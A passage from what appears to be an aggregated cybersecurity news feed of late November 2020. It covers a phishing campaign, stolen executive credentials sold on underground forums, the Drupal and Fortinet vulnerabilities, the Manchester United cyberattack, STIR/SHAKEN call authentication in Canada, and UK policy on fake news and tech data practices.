Based on the email addresses employed in this campaign, Mitiga researchers determined that the campaign mainly aimed at C-level executives at small and medium-sized businesses as well as major financial institutions.

Additional technical details about this campaign, along with Mitiga recommendations to avoid falling victim to these attacks are reported here.

Pierluigi Paganini

(SecurityAffairs – hacking, Office 365)

The post Office 365 phishing campaign leverages Oracle and Amazon cloud services appeared first on Security Affairs.

CISA Warns of Password Leak on Vulnerable Fortinet VPNs

Agency Says Hackers Can Use a Known Bug for Further Exploitation
CISA is warning about a possible password leak that could affect vulnerable Fortinet VPNs and lead to further exploitation. The latest agency notice comes just days after hackers began publishing what they claim are leaked passwords on underground forums, according to researchers.

Is AliExpress Safe? The Answer Might Surprise You

Is AliExpress Safe? A Brief History of Online Shopping  According to ODM World, online shopping refers to a “unique form of electronic commerce (known as eCommerce) which connects customers and sellers on all corners of the internet with the use of a web browser. […] there are two forms an online shop could take. First […]

The post Is AliExpress Safe? The Answer Might Surprise You appeared first on Heimdal Security Blog.

Hundreds of C-level executives credentials available for $100 to $1500 per account

A credible threat actor is offering access to the email accounts of hundreds of C-level executives for $100 to $1500 per account.

Access to the email accounts of hundreds of C-level executives is available on the Exploit.in for $100 to $1500 per account. Exploit.in is a popular closed-access underground forum for Russian-speaking hackers, and it isn’t the only one, other prominent forums are fuckav.ru, Blackhacker, Omerta, and L33t. 

The news reported by ZDnet is not surprising, I have discovered several times such kind of offer, but it is important to raise awareness on the cybercrime-as-a-service model that could rapidly enable threat actors to carry out malicious activities.

The availability of access to the email accounts of C-level executives could allow threat actors to carry out multiple malicious activities, from cyber espionage to BEC scams.

The threat actor is selling login credentials for Office 365 and Microsoft accounts and the price depends on the size of the C-level executives’ companies and the internal role of the executive.

The threat actor claims its database includes login credentials of high-level executives such as:

  • CEO – chief executive officer
  • COO – chief operating officer
  • CFO – chief financial officer or chief financial controller
  • CMO – chief marketing officer
  • CTOs – chief technology officer
  • President
  • Vice president
  • Executive Assistant
  • Finance Manager
  • Accountant
  • Director
  • Finance Director
  • Financial Controller
  • Accounts Payables

ZDnet confirmed the authenticity for some of the data available for sale.

“A source in the cyber-security community who agreed to contact the seller to obtain samples has confirmed the validity of the data and obtained valid credentials for two accounts, the CEO of a US medium-sized software company and the CFO of an EU-based retail store chain.” reported ZDNet.

At the time of writing, it is unclear how the threat actor has obtained the login credentials.

Experts from threat intelligence firm KELA, speculate the threat actor could have obtained the credentials buying “Azor logs,” which are lots of data stolen from computers infected with the AzorUlt info-stealer trojan.

Data collected by info-stealers are available for sale in the underground, threat actors use to buy and parse them searching for sensitive data such as account credentials.

In July, the US Department of Justice has indicted a hacker that goes online with the moniker Fxmsp for hacking over three hundred organizations worldwide and selling access to their networks.

Once the hacker gained access to the network, they deployed password-stealing malware and remote access trojans (RATs) to harvest credentials and establish persistence in the system.

The name Fxmsp refers a high-profile Russian- and English-speaking hacking group focused on breaching high-profile private corporate and government information.

Since March 2019, Fxmsp announced in cybercrime forums the availability of information stolen from major antivirus companies located in the U.S.

Between 2017 and 2018, Fxmsp created a network of trusted proxy resellers to promote their breaches on the criminal underground.

Fxmsp used to compromise Active Directory of target organizations and ensure external access through remote desktop protocol (RDP) connections.

Turchin attempted to sell access to these networks on hacker forums (i.e. Exploit.in, fuckav.ru, Club2Card, Altenen, Blackhacker, Omerta, Sniff3r, and L33t) and dark web marketplaces for prices ranging between a few thousands of dollars up to over $100,000.

The group also claimed to have developed a credential-stealing botnet capable of infecting high-profile targets and exfiltrate sensitive data, including access credentials.

Fxmsp hacked antivirus companies 2

In 2019, Fxmsp confirmed to have breached the networks of some security companies and to have obtained long-term access.

The group offered access to single companies for $250,000 and is asking $150,000 for the source code of the software. Buyers can also pay at least $300,000 to acquire both, the price depends on the compromised company.

Pierluigi Paganini

(SecurityAffairs – hacking, executive)

The post Hundreds of C-level executives credentials available for $100 to $1500 per account appeared first on Security Affairs.

Drupal emergency updates fix critical arbitrary PHP code execution

Drupal has released emergency security updates to fix a critical flaw with known exploits that could allow for arbitrary PHP code execution.

Drupal has released emergency security updates to address a critical vulnerability with known exploits that could be exploited to achieve arbitrary PHP code execution on some CMS versions.

The Drupal project uses the PEAR Archive_Tar library that was recently updated to address the CVE-2020-28948 and CVE-2020-28949.

As a consequence, multiple vulnerabilities impact Drupal installs when they are configured to allow .tar, .tar.gz, .bz2, or .tlz file uploads and processes them.

“Drupal has released security updates to address vulnerabilities in Drupal 7, 8.8 and earlier, 8.9, and 9.0. An attacker could exploit this vulnerability to take control of an affected system.” reads the advisory published by CISA.

“The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Drupal Advisory SA-CORE-2020-013 and apply the necessary updates.”

“According to the regular security release window schedule, November 25th would not typically be a core security window,” reads the security advisory published by Drupal.

“However, this release is necessary because there are known exploits for one of core’s dependencies and some configurations of Drupal are vulnerable.”

Drupal released the following updates to address the issues:

“Versions of Drupal 8 prior to 8.8.x are end-of-life and do not receive security coverage,” Drupal’s security team added.

Drupal also recommends to mitigate this issue by preventing untrusted users from uploading .tar, .tar.gz, .bz2, or .tlz files.

The number of vulnerable Drupal installs is approximatively over 940,000 out of a total of 1,120,94.

Last week, the Drupal development team has released security updates to fix a remote code execution vulnerability related caused by the failure to properly sanitize the names of uploaded files.

The vulnerability, tracked as CVE-2020-13671, has been classified as critical according to the NIST Common Misuse Scoring System.

The flaw could be exploited by an attacker by uploading files with certain types of extensions (phar, php, pl, py, cgi, html, htm, phtml, js, and asp) to the server to achieve remote code execution.

Pierluigi Paganini

(SecurityAffairs – hacking, PHP code execution)

The post Drupal emergency updates fix critical arbitrary PHP code execution appeared first on Security Affairs.

Rebooting the Office

Employers face not only the challenge of developing a plan to safely reopen the office. They must also begin to reimagine the future of work in this new environment. In short, it is time to “reboot” the office. The reboot will affect everything, not just physical office space, but also technology, people and policies. It…

The post Rebooting the Office first appeared on IT World Canada.

Cyber Security Today Week In Review for November 27, 2020

The holiday shopping period is upon us with Black Friday officially starting today. Why not get a security-related gift? Guest analyst Dinah Davis of Arctic Wolf and I discuss what's available in books, software and stocking-stuffers

The post Cyber Security Today Week In Review for November 27, 2020 first appeared on IT World Canada.

Out-of-band Drupal security updates fix bugs with known exploits

Drupal has released out-of-band security updates to fix two critical code execution flaws (CVE-2020-28948, CVE-2020-28949) in Drupal core, as “there are known exploits for one of core’s dependencies and some configurations of Drupal are vulnerable.” The vulnerabilities (CVE-2020-28948, CVE-2020-28949) CVE-2020-28948 and CVE-2020-28949 are arbitrary PHP code execution vulnerabilities found in the open source PEAR Archive_Tar library, which Drupal uses to handle TAR files in PHP. “(The) vulnerabilities are possible if Drupal is configured to allow … More

The post Out-of-band Drupal security updates fix bugs with known exploits appeared first on Help Net Security.

North Korean hackers allegedly behind cyberattacks on AstraZeneca

The Reuters agency revealed in an exclusive that the COVID vaccine maker AstraZeneca was targeted by alleged North Korea-linked hackers.

According to a report published by Reuters, suspected North Korea-linked hackers targeted AstraZeneca, one of the companies that are developing a COVID vaccine.

The attack attempts took place in recent weeks, two people with knowledge of the matter told Reuters. The attackers used a well-known tactic, the hackers posed as recruiters on popular social network platforms and instant messaging applications, including LinkedIn and WhatsApp, to approach AstraZeneca employees with fake job offers.

“They then sent documents purporting to be job descriptions that were laced with malicious code designed to gain access to a victim’s computer.” reported Reuters. “The hacking attempts targeted a “broad set of people” including staff working on COVID-19 research, said one of the sources, but are not thought to have been successful.”

Pyongyang has always denied carrying out cyberattacks on healthcare organizations and entities involved in the development of a vaccine.

The attribution to North Korea is based on the analysis of tools and techniques used in the cyber that presents significant overlaps on an ongoing hacking campaign that U.S. officials and cybersecurity researchers.

According to the experts, the same campaign also aimed at defence companies, media organisations, and COVID-related targets, such as vaccine scientists and drugmakers.

A report recently published by the Canadian Centre for Cyber Security, titled “National Cyber Threat Assessment 2020,” warns of risks associated with state-sponsored operations from China, Russia, Iran, and North Korea.

Nation-state actors linked to the above countries pose the greatest strategic threats to Canada and according to the report, they will continue to attempt to steal Canadian intellectual property, especially related to COVID-19.

Threat actors are carrying out cyber espionage campaigns and online influence campaigns.

South Korean lawmakers announced last week that the country’s intelligence agency had foiled cyber attacks.

Reuters added that some of the accounts employed in the attacks on AstraZeneca were registered to Russian email addresses, but one of the sources speculated that it could be a false flag used by the attackers.

At the time of writing, AstraZeneca declined to comment.

Pierluigi Paganini

(SecurityAffairs – hacking, AstraZeneca)

The post North Korean hackers allegedly behind cyberattacks on AstraZeneca appeared first on Security Affairs.

SHAKE them and STIR them: how Canada is fighting scam calls

Scam calls suck. In 2019 alone, 26 billion illegal robocalls and scam calls eroded subscriber’s faith in telephone service worldwide, an increase of 18 per cent year over year. In many cases, vampiric scammers hunted people’s wallets. Between January and October 2019, they stole $24 million from Canadians.

Fraud and anti-spam laws set harsh punishments for criminals, but they can only be enforced after the damage has been done. Netting the perps is even harder. Therefore, these calls must be stopped before they reach the receiver.

Amid the swelling volume of spam calls, the world raced to find a defence. In Canada and the United States, STIR/SHAKEN has been selected as the best candidate. With a name inspired by James Bond’s famed quote, STIR/SHAKEN will be the first antidote to curing the spam call plague.

Key terms:

  • STIR: Secure Telephony Identity Revisited, the standard developed by the IETF that defines signature-based call authentication.
  • SHAKEN: Signature-based Handling of Asserted information using toKENs, the framework for implementing STIR.

However, before discussing STIR/SHAKEN’s implementation, it’s important to understand the two popular telephone network protocols.

TDM vs SIP telephone networks

These calls were made over the Public Switched Telephone Network (PSTN), a term that would persist to describe the plain old telephone service. Old films often cast operators swapping wires on a switchboard to route a call. These depict the circuit-switched system. Eventually, the invention of the SS7 protocol set and the time-division multiplexing (TDM) in 1975 retired the human operators.

The TDM-based system was superior to humans in that it could carry many calls over a single wire, consolidating the hundreds of cables in dedicated connections. It achieved this by quickly switching between different calls, so quick that the gaps between voices were unperceivable. Its high reliability and simple implementation would dominate the phone industry for the next 50 years. But in the 21st century, demand for richer call services have exceeded TDM’s capabilities.

After much scouring, the industry settled on the session initiation protocol (SIP). The SIP protocol is a part of voice-over IP (VoIP) technology and operates over the internet as opposed to TDM’s specialized telephone hardware. Phone operators valued the SIP network’s reliability, cheaper hardware, the potential for new services, multimedia support, and better management capabilities. Its flexibility enabled STIR/SHAKEN, the upcoming hero in thwarting spoofed calls.

How STIR/SHAKEN works

The principle behind STIR/SHAKEN is based on digital signatures, an established technology that’s almost as old as the internet.

SHAKEN authentication over a SIP interconnect is trivial. When the caller makes a call, the SHAKEN Authentication module appends a digitally signed token to the call invite before passing it through the SIP interconnect. Once the invite reaches the receiver, the SHAKEN verification system qualifies the token and delivers/blocks the call. This simple system makes number spoofing exponentially harder.

STIR has been around since 2013.

But there’s a catch: these tokens cannot be transmitted over legacy networks, which carries 85 per cent of all robocalls. This is because the tokens are dropped at the first SIP to TDM conversion. When the terminating STIR verification system does not see a token, it simply drops the invite. This is the largest roadblock in establishing the STIR/SHAKEN in Canada as most operators use a mix of both systems.

Also:

What are digital certificates and how do they work?

 

The solution is out-of-band (OOB) STIR/SHAKEN. It hands the token to a call placement service (CPS) before the network conversion, removing it from the call path and sends it to the destination over the internet instead. Once received, the authentication server would match the call invite and the token at the destination and begin the verification process. This small change bypasses the barriers between mixing network types.

Out-of-Band STIR/SHAKEN bypasses telephone network changes.

For operators with SIP networks, OOB STIR/SHAKEN is turnkey-esque. Operators that exclusively use TDM switches can upgrade to SIP hardware using inexpensive off-the-shelf parts. For situations where that’s impossible, operators can use an ISUP to SIP gateway.

Companies without direct access to phone numbers can implement STIR/SHAKEN as well. Google, for example, integrated STIR/SHAKEN in its proprietary call blocking service.

Because CPS has insight into all calls, its security needs to be carefully managed. The certification authority needs to gain approval from policymakers to run the CPS and be held accountable when things run amok. In Canada, the Canadia Secure Token-Governance Authority (CST-GA) is the central policymaker for digital certificates.

The governance authority has the highest authority in dictating policy. In Canada, that’s the CST-GA.

The business case lies in rich call data

STIR/SHAKEN also enhances a key peripheral use–rich call data. Rich call data contains information about who is calling and why. Additionally, it can contain information like name, logo, picture, and call reason. It even allows for a URL that links to external files to give deeper caller context. Together with STIR/SHAKEN, users can authenticate calls at a glance and companies gain greater control over their brand’s appearance.

SHAKEN token with rich call data includes extra fields for added caller transparency.

“There’s real value in that, it’s an easy business case to justify,” said Jim Dalton, CEO of TransNexus at the 2020 Canadian Telecom Summit. “We believe customers are going to pay for rich call data. And we think that because there are enterprises saying ‘I need my calls answered’…that’s the obvious first market: to sell to give them control over their branding, how and when they make a call, how it’s displayed while they’re calling. And most of all, it’s going to improve their call completion rates.”

An example of rich call displays with SHAKEN. Note the customizable logo, caller name, and the verified caller ID indicated by the green checkmark.

RCD is coming to desktop phones, smartphones, smart TVs, and stationary phones. It can even come to virtual communication. Zoom calls, for example, doesn’t verify where the connection is coming from. The user can access a meeting by clicking on the invite in the email. Imposters can easily hijack the link and pretend to be the recipient.

“We think there’s value in that it gives you a security identity for these outbound calls that you make,” said Dalton. “And it’s going to be great for inbound call centers….when they get that digitally signed token, there’s been some vetting by the service provider…and they can verify it with that call. It’s going to make their call or authentication processes much more robust.”

It’s up to the telecom operators to implement STIR/SHAKEN, but smartphone manufacturers will need to support rich call data. Dalton said it will be market-driven; if there’s high user demand, then it’s very likely it will be added quickly.

When is STIR/SHAKEN coming to Canada?

STIR/SHAKEN is planned for June 2021, but Canadians already have basic call protection.

In December 2019, Canadian carriers deployed a rudimentary blocking feature that barred calls from bogus numbers. While it blocked the most flagrant calls, it does nothing to combat call spoofing.

Thus, the CRTC mandated carriers to add STIR/SHAKEN by September 2020. But due to the effects of the pandemic, Canadian operators requested the CRTC to extend its implementation date by nine months. Rogers cited that some technical standards relating to STIR/SHAKEN haven’t been defined and that it needed more time to renegotiate contracts with vendors.

The post SHAKE them and STIR them: how Canada is fighting scam calls first appeared on IT World Canada.

The genesis of an ethical digital blueprint for the post-pandemic economy | An interview with Danny Lange, SVP of AI at Unity Technologies

We recently chatted with Danny Lange, senior vice president of AI at Unity Technologies to get his thoughts on the role of artificial intelligence in advancing a more ethical blueprint for the post-pandemic economy.

The post The genesis of an ethical digital blueprint for the post-pandemic economy | An interview with Danny Lange, SVP of AI at Unity Technologies first appeared on IT World Canada.

How to Reduce Fake News in Online Advertising

How to Reduce Fake News in Online Advertising

Steps can be taken to reduce the threat of fake news infiltrating online advertising.

Speaking during the Westminster Forum Conference about tackling fake news and online misinformation, Konrad Shek, deputy director, policy and regulation at the Advertising Association, said the advent of disinformation has had an “enormous impact on trust in the media and politics.”

He said within commercial advertising there have been cases of false claims and promoted stories, and manipulated content, which can appear on social media and news feeds, while some websites that do “propagate false information are supported by adverts and legitimate ads can find themselves on these dubious websites.”

He also explained that there are online fraudsters that use tactics to better promote adverts, including adding clicks for misattribution, which can divert advertisers’ money to the fraudulent actor. “I’d refrain from saying that restricting adverts is a solution, as you have to think about the consequences of an approach and the impact it would have on the free internet,” he said. This calls for four options, he contitinued:

  1. Try and choke the funds to fake news websites, as brands are already sensitive about the impact of being associated with these websites and this is a good incentive to work towards being placed on such websites. However, he pointed out that the speed of ads in the supply chain mean it may not always be possible to know where the ad has been published
  2. The use of standards and technology to reduce ad fraud and reduce advertising money in the supply chain. “There are already a number of industry standards that have anti-fraud certification processes,” he said, with technology that can aid in the fight against ad fraud with an ever-increasing number of detection and prevention tools. “To that end, it is really important that the ASA is properly funded and it can continue to invest in technology to help it spot non-compliant ads online”
  3. Aiding the general public to build resistance and encourage critical thinking skills. “We need to invest more in digital literacy to help people inoculate themselves against scams and misinformation,” he said. “With society as a whole, we need to look at media more critically – look at ads with a more critical eye and ask what the motivation behind it is, and is it too good to be true?”
  4. Address political advertising, as this is not regulated by the ASA. “Politicians and political parties need to come together to figure out an appropriate solution soon, as in the meantime, unregulated political advertising erodes trust in all advertising”

“There is obviously a lot more to be done,” Shek said. “Economic gain is a significant factor in why disinformation exists as advertising plays a core part in it, but we need to realize there are other factors in play.”

He claimed a solution requires a holistic and proper multi-disciplinary approach, and work needs to be done to ensure like-minded countries are allied on this, as it is hard to discern what is real and what is not.

Experts Call for Online Fake News to Be Addressed as #COVID19 Vaccine Emerges

Experts Call for Online Fake News to Be Addressed as #COVID19 Vaccine Emerges

There needs to be better steps taken by politicians and social media platforms to deal with fake news, especially as the COVID-19 vaccine is created.

Speaking during the Westminster Forum Conference on tackling fake news and online misinformation, event chair Khalid Mahmood MP, shadow defense minister for procurement, said, as we have seen throughout the pandemic, certain misinformation has been passed around and it is effective in getting to people. “That is just in terms of the pandemic that we are seeing at the moment,” he added, pointing out that fake news is published about politicians too.

He said an issue is how responsibility “is totally negated from platforms where someone can put whatever they want and move forward” and trying to trace that back and address that is becoming increasingly difficult as platforms take time to deal with it.

Admitting that this is a very difficult issue to deal with, he said we need to look at some sort of level footing on this, before it is out of control.

Commenting on the role of platform providers, Katie O’Donovan, head of public policy at Google UK, said there is a challenge around freedom of speech where the meaning around the words can vary, depending on how things are said.

She said: “So you cannot regulate words and sentences, you have to understand the context of how they were made, and ask what is the context and hyperbole and is it a threat made to an individual or a group of people?”  

Asked by Infosecurity if social media platforms are doing enough to prevent fake news whilst enabling free speech, O’Donovan said there is a need for more legislation and regulation. She argued that government is doing a good job on addressing a broad range of harms, whilst offering the opportunity to engage and to “have a vibrant online debate.” However, platforms have a responsibility not to wait for that regulation, and over the years, that has grown very steadily.

Michael Wendling, editor of the Trending and Anti-Disinformation Unit at BBC News, said there is going to be a massive wave of vaccine disinformation, which is ramping up now, and as the vaccine becomes available for COVID-19 “that will make what happened over the 5G masts look like a minor skirmish.” He said if measures by platforms are effective, there will be a larger take up of the vaccine, and if not, there will be less of a take up and the pandemic may continue.

Also speaking was Oscar Tapp-Scotting, deputy director for security and international at DCMS, who confirmed it has been working with platforms to address disinformation and has seen platforms take steps to reduce “misleading narratives.”

He said: “Each of the platforms is different; each has a different user base and provides information in different ways, so how they tackle this will vary by platform.” He also said that in a recent meeting with social media platforms, they would agree to work with healthcare organizations to publish correct information, so users have the ability to make the right choice.

Mahmood said there is a need for politicians to look at social media and how it deals with fake news, “and this has to be the way for all of us in how we deal with fake news, as ultimately there has to be some sort of responsibility between both us and the platforms and how we get the motion across and how we get them to work together.”

NCSC Helping Man United Recover from Cyber-Attack

NCSC Helping Man United Recover from Cyber-Attack

The National Cyber Security Centre (NCSC) is assisting Manchester United in dealing with the cyber-attack which struck the English football club last week.

Last Friday, the Premier League side confirmed in a statement that an incident had taken place,  following which affected systems were shut down to “contain the damage and protect data.”

One week later and the club’s internal IT system is not fully back up and running, with staff still unable to access emails alongside other operations. The NCSC is now helping Manchester United as it seeks to secure its network before restoring its IT system to full capacity.

A NCSC spokesperson is quoted as saying: “The NCSC is aware of an incident affecting Manchester United football club and we are working with the organization and partners to understand the impact.”

In its original statement, Manchester United said that its website and app were unaffected by the attack and it was not aware of any breach of personal data belonging to fans or customers, and this was reiterated on Thursday night. Quoted in The Guardian, the new statement read: “This attack was by nature disruptive, but we are not currently aware of any fan data being compromised.

“Critical systems required for matches to take place at Old Trafford remained secure and games have gone ahead as normal.”

Manchester United added that it would not be commenting on who was responsible for the attack or the motives that lay behind it.

Security experts have suggested the attack is likely to be ransomware. Commenting earlier this week, Jon Niccolls, EMEA & APAC incident response lead at Check Point, said: “It isn’t clear what type of attack hit the club, but as its statement mentioned that it ‘shut down affected systems to contain the damage and protect data,’ this suggests ransomware, and possibly a double extortion attack where the attackers both steal data with the threat of leaking it, as well as encrypting it to disrupt operations.”

Commenting on the incident, Adam Enterkin, SVP, EMEA, BlackBerry, told Infosecurity: “The exploitation of sporting giants by cyber-criminals is not a surprise. Amid a pandemic characterized by opportunistic cyber-attackers, and a huge deficit of security professionals in the UK, such an attack was all but inevitable. Manchester United isn’t the first to be hacked, and it won’t be the last.

“These attacks are, however, preventable. The truth is that the entire nation needs better cyber-hygiene. Even national institutions like sports teams can fall prey to simple phishing emails, which are responsible for a large proportion of cyber-attacks. Cyber-criminals are waiting for organizations and the public to drop their guard. We must not give them the opportunity.” 

“Ultimately, security teams at football clubs need the same tech as major banks and hospitals, to protect livelihoods and customer data. AI technology can help manage the volume of potential threats, spotting anomalies in data and dealing with menial and repetitive tasks whilst flagging potentially serious situations to the cybersecurity team. Humans and tech must work hand-in-hand, so the professionals are equipped with the right knowledge and skill sets to keep our nation’s much-loved sporting institutions safe.”

Productivity Tools May Be Monitoring Workers’ Productivity

Regulatory and Employee Litigation Risks Face Businesses That Violate Privacy Rules
Warning to workers: Your productivity tools may also be tracking your workplace productivity, and your bosses may not even know it. But as more workplace surveillance capabilities appear, legal experts warn that organizations must ensure their tools do not violate employees' privacy rights.

Two in Five Home Workers Vulnerable to Cyber-Attacks

Two in Five Home Workers Vulnerable to Cyber-Attacks

Two in five remote workers in the UK are vulnerable to cyber-attacks as they have not received information about how to avoid COVID-19 scams or had any video call security training. This is according to a new report by Fasthosts, which looked at the additional cyber-risks businesses are facing as a result of the shift to home working this year.

The study also found that over half (54%) of remote workers are currently operating without a VPN, potentially increasing the risk of personal and company data getting compromised. Additionally, around a quarter allow others in their household look at confidential documents.

The researchers revealed that those employed in the science and pharmaceutical industry were most likely to allow other members of their household access to their work computer/laptop, while law enforcement and security staff were the biggest culprits in allowing access to confidential data and documents.

Despite recent positive news regarding the development of a vaccine for the virus, it is expected that there will be far more remote working going forward compared to pre-COVID. Fasthosts cited data from the Institute of Directors showing that three quarters (74%) of 958 company directors intend to continue with increased home working after the pandemic. It is therefore vital that organizations provide the tools and training to ensure their staff are more secure whilst operating from home.

Michelle Stark, sales and marketing director at Fasthosts, commented: “It’s sad to see the risks of cybercrime so prevalent whilst many Britons are working from home. Keeping you and the business safe online is critical to keep confidential data secure. We urge all consumers to read our top tips, be more mindful and seek the correct training whilst working from home.”

Last month, a study by Mimecast found that remote workers are increasingly putting corporate data and systems at risk by failing to follow best practice security.

A week later, Manchester United has yet to recover after a cyberattack

Manchester United is still facing problems after the cyber attack that suffered last week, it has yet to fully restore its systems.

Last week Manchester United was hit by a sophisticated cyber attack, the attack took place on Friday evening and the football club shut down its systems to prevent the malware from spreading within.

“Manchester United can confirm that the club has experienced a cyber attack on our systems. The club has taken swift action to contain the attack and is currently working with expert advisers to investigate the incident and minimise the ongoing IT disruption.” reads a statement issued by the Manchester United and reported by The Guardian.

“Although this is a sophisticated operation by organised cyber criminals, the club has extensive protocols and procedures in place for such an event and had rehearsed for this eventuality. Our cyber defences identified the attack and shut down affected systems to contain the damage and protect data.”

Manchester United

The club notifies the British authotities about the incident, including the Information Commissioner’s Office. The United also launched a forensic investigation into the incident.

A week later, Manchester United has yet to fully restore its computer systems, yesterday the company was still unable to send and receive emails, and other functions were unavailable too.

“Following the recent cyberattack on the club, our IT team and external experts secured our networks and have conducted forensic investigations,” Manchester United said in a statement.

The club did not comment on the possible culprits and their motivation, it only revealed that attackers aimed at disrupt the target systems.

“This attack was by nature disruptive, but we are not currently aware of any fan data being compromised,” the club said. “Critical systems required for matches to take place at Old Trafford remained secure and games have gone ahead as normal.”

Pierluigi Paganini

(SecurityAffairs – hacking, cybercrime)

The post A week later, Manchester United has yet to recover after a cyberattack appeared first on Security Affairs.

You too can be a security intelligence expert, with these free tools from Recorded Future

Many thanks to the great folks at Recorded Future, who have sponsored my writing for the past week. If 2020 taught the security industry anything, it is this: There has never been a better time to be a cybercriminal. From extortion ransomware to cyberespionage campaigns, adversaries are capitalizing on uncertainty, causing chaos, and cashing in. … Continue reading "You too can be a security intelligence expert, with these free tools from Recorded Future"

Cybersecurity Predictions for 2021: Robot Overlords No, Connected Car Hacks Yes

While 2021 will present evolving threats and new challenges, it will also offer new tools and technologies that will we hope shift the balance towards the defense.

ThreatList: Cyber Monday Looms – But Shoppers Oblivious to Top Retail Threats

Online shoppers are blissfully unaware of credit card skimming threats and malicious shopping apps as they head into this year's Black Friday and Cyber Monday holiday shopping events.

Coffee Briefing, November 27, 2020 – Leadership changes, Dell’s Q3, and MSPs ask for help managing bad clients

Today's Coffee Briefing features a list of recent leadership changes, Dell's Q3 earnings, and social media chatter from MSPs seeking help with bad clients.

The post Coffee Briefing, November 27, 2020 - Leadership changes, Dell's Q3, and MSPs ask for help managing bad clients first appeared on IT World Canada.

New Code to Force Tech Giants to Provide Greater Data Transparency and Choice

New Code to Force Tech Giants to Provide Greater Data Transparency and Choice

The UK government has unveiled plans to develop a new statutory code for tech companies that is designed to give customers more choice and control over their data.

The Department for Digital, Culture, Media and Sport (DCMS) said that a dedicated Digital Markets Unit will work alongside regulators such as Ofcom and the Information Commissioners Office (ICO) to create and enforce the code, which will govern the behavior of digital platforms, including those funded by digital advertising currently dominating the market, such as Google and Facebook. Measures are likely to include forcing such firms to be more transparent about how they are using customer data and to offer consumers a choice on whether they’d like to receive personalized advertising.

Another important aim of the code is to harness more competition within the online publishing industry by helping ensure smaller businesses aren’t disadvantaged by tech giants. This could include ensuring small businesses have fair access to platform services that help them grow their online business, such as digital advertising.

The unit, which will be part of the Competitions and Markets Authority (CMA), will begin operating from April 2021, and may have the power to suspend, block and reverse decisions made by tech firms as well as impose financial penalties for non-compliance.

Issues surrounding the use of data online have come into sharper focus this year, with the COVID-19 pandemic leading to a huge rise in digital users, including the sharing of creative content and advertising of small businesses’ products and services.

Digital secretary Oliver Dowden commented: “I’m unashamedly pro-tech and the services of digital platforms are positively transforming the economy, bringing huge benefits to businesses, consumers and society.

“However, there is growing consensus in the UK and abroad that the concentration of power among a small number of tech companies is curtailing growth of the sector, reducing innovation and having negative impacts on the people and businesses that rely on them. It is time to address that and unleash a new age of tech growth.”

The global impact of the Fortinet 50.000 VPN leak posted online

The global impact of the Fortinet 50.000 VPN leak posted online, with many countries impacted, including Portugal.

A compilation of one-line exploit tracked as CVE-2018-13379 and that could be used to steal VPN credentials from nearly 50.000 Fortinet VPN devices has posted online.

This vulnerability resides in an improper limitation of a pathname to a restricted directory (“Path Traversal”) in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests. According to NIST NVD, the flaw has a CVSS base score of 9.8 – CRITICAL.

The compilation contains 49,577 IP addresses vulnerable to Fortinet SSL VPN CVE-2018-13379, according to Bank Security, who first noticed the leak on Twitter.

In detail, the exploitation of the critical Fortinet vulnerability puts the attacker in a privileged place, with access to the sensitive “sslvpn_websession” files from Fortinet VPNs.

After analyzing the leaked data, we noticed the list of vulnerable targets includes domains belonging to large enterprises, financial institutions, and government organizations from all over the world. In order to understand the volume and impact of this threat, we organized all the data on a geographic map presented below.

Geomap of impacted countries

As observed, the USA is the most impacted country, with a total of 10.103 vulnerable devices shared in this leak. China, Japan, Korea, Brazil, Germany, United Kingdom, Spain, Italy, and Spain are part of the TOP 10 most impacted countries. Also, Portugal can be found in this list, with 136 devices vulnerable. Next, the complete list of this analysis is presented.

Complete list of affected countries

  • 10103 United States
  • 6336 China
  • 2821 Japan
  • 2543 Korea
  • 2280 Brazil
  • 2212 Germany
  • 2127 United Kingdom
  • 1547 Spain
  • 1370 Italy
  • 1294 France
  • 1096 Australia
  • 981 Russian Federation
  • 847 Netherlands
  • 761 Argentina
  • 688 Taiwan
  • 648 Canada
  • 575 Egypt
  • 569 Colombia
  • 520 South Africa
  • 444 India
  • 424 Poland
  • 400 Sweden
  • 397 Indonesia
  • 384 Denmark
  • 374 Mexico
  • 367 Switzerland
  • 364 Turkey
  • 353 Chile
  • 344 Viet Nam
  • 325 Venezuela
  • 308 Ukraine
  • 267 Hong Kong
  • 253 Pakistan
  • 238 Hungary
  • 226 Finland
  • 220 New Zealand
  • 217 Czech Republic
  • 206 Romania
  • 177 Belgium
  • 163 Austria
  • 153 Iran
  • 147 Philippines
  • 136 Portugal
  • 135 Estonia
  • 128 Norway
  • 123 Saudi Arabia
  • 122 Peru
  • 118 Ireland
  • 113 Panama
  • 110 Thailand
  • 104 Malaysia
  • 88 Kuwait
  • 87 Israel
  • 77 Uruguay
  • 73 Azerbaijan
  • 69 Singapore
  • 61 United Arab Emirates
  • 59 El Salvador
  • 58 Bangladesh
  • 55 Slovenia
  • 53 Greece
  • 51 Belarus
  • 51 Kenya
  • 46 Bulgaria
  • 45 Paraguay
  • 45 Slovakia
  • 43 Oman
  • 41 Ecuador
  • 41 Lithuania
  • 41 Morocco
  • 38 Honduras
  • 37 Dominican Republic
  • 31 Guatemala
  • 31 Seychelles
  • 30 Puerto Rico
  • 24 Latvia
  • 22 Macedonia
  • 21 Luxembourg
  • 20 Qatar
  • 19 Kazakhstan
  • 19 Kyrgyzstan
  • 18 Nicaragua
  • 17 Croatia
  • 17 Cyprus
  • 17 Lebanon
  • 16 Algeria
  • 15 Jordan
  • 14 Bahrain
  • 14 Costa Rica
  • 12 Ghana
  • 12 Moldova
  • 12 Syrian Arab Republic
  • 11 Nigeria
  • 11 Uzbekistan
  • 10 Bolivia
  • 10 Holy See (vatican City State)
  • 10 Iraq
  • 10 Trinidad And Tobago
  • 9 Bosnia And Herzegovina
  • 9 Iceland
  • 8 Cameroon
  • 8 Palestinian Territory
  • 8 Tanzania
  • 7 Georgia
  • 7 Ivory Coast
  • 7 Mauritius
  • 7 Myanma
  • 7 Zambia
  • 6 Angola
  • 6 Armenia
  • 6 Mozambique
  • 6 Sri Lanka
  • 5 French Polynesia
  • 5 Liberia
  • 5 Montenegro
  • 4 Palau
  • 4 Tunisia
  • 3 Afghanistan
  • 3 Aruba
  • 3 Fiji
  • 3 Malawi
  • 3 Nepal
  • 2 Aland Islands
  • 2 Bahamas
  • 2 Bermuda
  • 2 Cuba
  • 2 Guam
  • 2 Rwanda
  • 2 Uganda
  • 1 Andorra
  • 1 Belize
  • 1 Benin
  • 1 Botswana
  • 1 Cambodia
  • 1 Cayman Islands
  • 1 Guinea
  • 1 Martinique
